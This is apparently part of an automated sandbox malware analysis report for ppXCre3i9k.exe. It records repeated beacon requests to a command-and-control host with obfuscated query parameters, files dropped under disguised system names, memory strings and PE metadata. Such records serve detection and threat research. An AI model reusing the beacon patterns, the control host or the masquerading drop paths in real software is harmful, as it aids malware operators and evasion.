Source: global traffic HTTP traffic detected: GET /L1nc0In.php?VEid32e=5KnOfaDp2o1CFqeYZF38NP&fhjudVNYdmm6E03w=rHwBASGojKEx9fcppIq5pk&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&VEid32e=5KnOfaDp2o1CFqeYZF38NP&fhjudVNYdmm6E03w=rHwBASGojKEx9fcppIq5pk HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?KzH0=bh&DxjZjfOCS8Hqrt2FJM=4Pt5s&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&KzH0=bh&DxjZjfOCS8Hqrt2FJM=4Pt5s HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?KzH0=bh&DxjZjfOCS8Hqrt2FJM=4Pt5s&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&KzH0=bh&DxjZjfOCS8Hqrt2FJM=4Pt5s HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: esdjasd.maxkrnldc.online
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?wV6yMDoEOp6CE4ikEee1q2H6Zy7H=EZuKHnNiGrv0rY8Q86rX&tJRGN3N9ZXFhdJQL16Q=C7xsA9eIpb1Q&AVQcE4u9jrTqTNOsFGAbCiwV=FOYET7gzwcyAswBfUdQ&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&wV6yMDoEOp6CE4ikEee1q2H6Zy7H=EZuKHnNiGrv0rY8Q86rX&tJRGN3N9ZXFhdJQL16Q=C7xsA9eIpb1Q&AVQcE4u9jrTqTNOsFGAbCiwV=FOYET7gzwcyAswBfUdQ HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?wV6yMDoEOp6CE4ikEee1q2H6Zy7H=EZuKHnNiGrv0rY8Q86rX&tJRGN3N9ZXFhdJQL16Q=C7xsA9eIpb1Q&AVQcE4u9jrTqTNOsFGAbCiwV=FOYET7gzwcyAswBfUdQ&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&wV6yMDoEOp6CE4ikEee1q2H6Zy7H=EZuKHnNiGrv0rY8Q86rX&tJRGN3N9ZXFhdJQL16Q=C7xsA9eIpb1Q&AVQcE4u9jrTqTNOsFGAbCiwV=FOYET7gzwcyAswBfUdQ HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?P0BWwn=xD8KOAFhnF&er6UzMZnhq2HEMUzYMEwRy=DOAeMSQttP8JwM4Bz6J&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&P0BWwn=xD8KOAFhnF&er6UzMZnhq2HEMUzYMEwRy=DOAeMSQttP8JwM4Bz6J HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?P0BWwn=xD8KOAFhnF&er6UzMZnhq2HEMUzYMEwRy=DOAeMSQttP8JwM4Bz6J&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&P0BWwn=xD8KOAFhnF&er6UzMZnhq2HEMUzYMEwRy=DOAeMSQttP8JwM4Bz6J HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?WPqxBIO3l8KwOT9NhTLGwYvdmRH=idQh7nQF2GrDezz7t&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&WPqxBIO3l8KwOT9NhTLGwYvdmRH=idQh7nQF2GrDezz7t HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?WPqxBIO3l8KwOT9NhTLGwYvdmRH=idQh7nQF2GrDezz7t&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&WPqxBIO3l8KwOT9NhTLGwYvdmRH=idQh7nQF2GrDezz7t HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?aJEFD=DIiJHxHsWaRJglNiUoApJ&IThUZKOIFYxaBzNs=mEB6eANyK32zZFYdk9PmxY7dNV2VFj&UlrYkIgnTTfOQ=TpTY6bz8FJOH&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&aJEFD=DIiJHxHsWaRJglNiUoApJ&IThUZKOIFYxaBzNs=mEB6eANyK32zZFYdk9PmxY7dNV2VFj&UlrYkIgnTTfOQ=TpTY6bz8FJOH HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?aJEFD=DIiJHxHsWaRJglNiUoApJ&IThUZKOIFYxaBzNs=mEB6eANyK32zZFYdk9PmxY7dNV2VFj&UlrYkIgnTTfOQ=TpTY6bz8FJOH&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&aJEFD=DIiJHxHsWaRJglNiUoApJ&IThUZKOIFYxaBzNs=mEB6eANyK32zZFYdk9PmxY7dNV2VFj&UlrYkIgnTTfOQ=TpTY6bz8FJOH HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?VNzfEh38AspOaytSRK9BLXVflf=P3WpIeO4GbcHw2HzYd7uOVMZKu&m82T4iroEoDhuL4m0zDMJDh7Bn=l3r7eXql6OIhiENDLV6NiUsV&Hhpia4RQxGvXqiJDj7Y=SfI5AVlFaMRKVYX0BDfT0Qu&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&VNzfEh38AspOaytSRK9BLXVflf=P3WpIeO4GbcHw2HzYd7uOVMZKu&m82T4iroEoDhuL4m0zDMJDh7Bn=l3r7eXql6OIhiENDLV6NiUsV&Hhpia4RQxGvXqiJDj7Y=SfI5AVlFaMRKVYX0BDfT0Qu HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?VNzfEh38AspOaytSRK9BLXVflf=P3WpIeO4GbcHw2HzYd7uOVMZKu&m82T4iroEoDhuL4m0zDMJDh7Bn=l3r7eXql6OIhiENDLV6NiUsV&Hhpia4RQxGvXqiJDj7Y=SfI5AVlFaMRKVYX0BDfT0Qu&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&VNzfEh38AspOaytSRK9BLXVflf=P3WpIeO4GbcHw2HzYd7uOVMZKu&m82T4iroEoDhuL4m0zDMJDh7Bn=l3r7eXql6OIhiENDLV6NiUsV&Hhpia4RQxGvXqiJDj7Y=SfI5AVlFaMRKVYX0BDfT0Qu HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?Tzm6OxIQRqZYunjCd1MOgk=nBBU0zIwqR&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&Tzm6OxIQRqZYunjCd1MOgk=nBBU0zIwqR HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?Tzm6OxIQRqZYunjCd1MOgk=nBBU0zIwqR&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&Tzm6OxIQRqZYunjCd1MOgk=nBBU0zIwqR HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?ovGqtVTp5BaF90XbIwsVGXLk7k=vVAyytNBuojB9pcX5x&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&ovGqtVTp5BaF90XbIwsVGXLk7k=vVAyytNBuojB9pcX5x HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?ovGqtVTp5BaF90XbIwsVGXLk7k=vVAyytNBuojB9pcX5x&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&ovGqtVTp5BaF90XbIwsVGXLk7k=vVAyytNBuojB9pcX5x HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?TnqYKyaIywq=qs3uS75r3jqkbptI0tYXMWWVaJ&N8UxeC0d2aYn8OLau6G6fERS=XSlT&hUILssjwMhlL=rcGaJB6lZUMQIrCsGuPKf3Dfwgc1&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&TnqYKyaIywq=qs3uS75r3jqkbptI0tYXMWWVaJ&N8UxeC0d2aYn8OLau6G6fERS=XSlT&hUILssjwMhlL=rcGaJB6lZUMQIrCsGuPKf3Dfwgc1 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?TnqYKyaIywq=qs3uS75r3jqkbptI0tYXMWWVaJ&N8UxeC0d2aYn8OLau6G6fERS=XSlT&hUILssjwMhlL=rcGaJB6lZUMQIrCsGuPKf3Dfwgc1&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&TnqYKyaIywq=qs3uS75r3jqkbptI0tYXMWWVaJ&N8UxeC0d2aYn8OLau6G6fERS=XSlT&hUILssjwMhlL=rcGaJB6lZUMQIrCsGuPKf3Dfwgc1 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?RVpUqBOi8pHAIsyoJmOvSI=fxU8LTF1zIvPTL2gmsQeSxS9T9dZc&1XIZJhVCCO2x=1WdfdQFmCB&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&RVpUqBOi8pHAIsyoJmOvSI=fxU8LTF1zIvPTL2gmsQeSxS9T9dZc&1XIZJhVCCO2x=1WdfdQFmCB HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?RVpUqBOi8pHAIsyoJmOvSI=fxU8LTF1zIvPTL2gmsQeSxS9T9dZc&1XIZJhVCCO2x=1WdfdQFmCB&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&RVpUqBOi8pHAIsyoJmOvSI=fxU8LTF1zIvPTL2gmsQeSxS9T9dZc&1XIZJhVCCO2x=1WdfdQFmCB HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?VEid32e=5KnOfaDp2o1CFqeYZF38NP&fhjudVNYdmm6E03w=rHwBASGojKEx9fcppIq5pk&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&VEid32e=5KnOfaDp2o1CFqeYZF38NP&fhjudVNYdmm6E03w=rHwBASGojKEx9fcppIq5pk HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?VEid32e=5KnOfaDp2o1CFqeYZF38NP&fhjudVNYdmm6E03w=rHwBASGojKEx9fcppIq5pk&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&VEid32e=5KnOfaDp2o1CFqeYZF38NP&fhjudVNYdmm6E03w=rHwBASGojKEx9fcppIq5pk HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?KzH0=bh&DxjZjfOCS8Hqrt2FJM=4Pt5s&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&KzH0=bh&DxjZjfOCS8Hqrt2FJM=4Pt5s HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?KzH0=bh&DxjZjfOCS8Hqrt2FJM=4Pt5s&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&KzH0=bh&DxjZjfOCS8Hqrt2FJM=4Pt5s HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: esdjasd.maxkrnldc.online
Source: unknown DNS traffic detected: queries for: esdjasd.maxkrnldc.online
Source: dllhost.exe, 00000023.00000002.1709726280.000000000267A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000023.00000002.1709726280.0000000002671000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://esdjasd.maxkrnldc.online
Source: dllhost.exe, 00000023.00000002.1709726280.0000000002641000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000023.00000002.1709726280.000000000267A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://esdjasd.maxkrnldc.online/
Source: dllhost.exe, 00000023.00000002.1709726280.0000000002654000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000023.00000002.1709726280.000000000267A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://esdjasd.maxkrnldc.online/L1nc0In.php?wV6yMDoEOp6CE4ikEee1q2H6Zy7H=EZuKHnNiGrv0rY8Q86rX&tJRGN3
Source: ppXCre3i9k.exe, 00000000.00000002.1669372033.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000023.00000002.1709726280.0000000002654000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Creates files inside the system directory
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Windows\Fonts\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Windows\Fonts\XYIphamTjljSgoBQQlfKpXxgNOIO.exe\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Windows\Fonts\2d0856477bae9b Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Code function: 0_2_00007FFD9B8833E0 0_2_00007FFD9B8833E0
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Code function: 0_2_00007FFD9B88A78D 0_2_00007FFD9B88A78D
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Code function: 0_2_00007FFD9B89A600 0_2_00007FFD9B89A600
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Code function: 0_2_00007FFD9B88AD80 0_2_00007FFD9B88AD80
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Code function: 0_2_00007FFD9B88C4E0 0_2_00007FFD9B88C4E0
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Code function: 0_2_00007FFD9B889CB3 0_2_00007FFD9B889CB3
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Code function: 0_2_00007FFD9B889CB3 0_2_00007FFD9B889CB3
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Code function: 0_2_00007FFD9B88A78D 0_2_00007FFD9B88A78D
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Code function: 35_2_00007FFD9B8B3585 35_2_00007FFD9B8B3585
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Code function: 38_2_00007FFD9B893585 38_2_00007FFD9B893585
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Code function: 39_2_00007FFD9B8A3585 39_2_00007FFD9B8A3585
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Code function: 40_2_00007FFD9B873585 40_2_00007FFD9B873585
Source: C:\Users\user\3D Objects\services.exe Code function: 41_2_00007FFD9B8A3585 41_2_00007FFD9B8A3585
PE file contains executable resources (Code or Archives)
Source: ppXCre3i9k.exe Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: XYIphamTjljSgoBQQlfKpXxgNOIO.exe.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: MoUsoCoreWorker.exe.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: dllhost.exe.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: services.exe.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Sample file is different than original file name gathered from version info
Source: ppXCre3i9k.exe, 00000000.00000002.1672845013.000000001BB2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs ppXCre3i9k.exe
Source: ppXCre3i9k.exe, 00000000.00000000.1638286349.0000000000602000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs ppXCre3i9k.exe
Source: ppXCre3i9k.exe, 00000000.00000002.1673187303.000000001BBE9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs ppXCre3i9k.exe
Source: ppXCre3i9k.exe Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs ppXCre3i9k.exe
Uses 32bit PE files
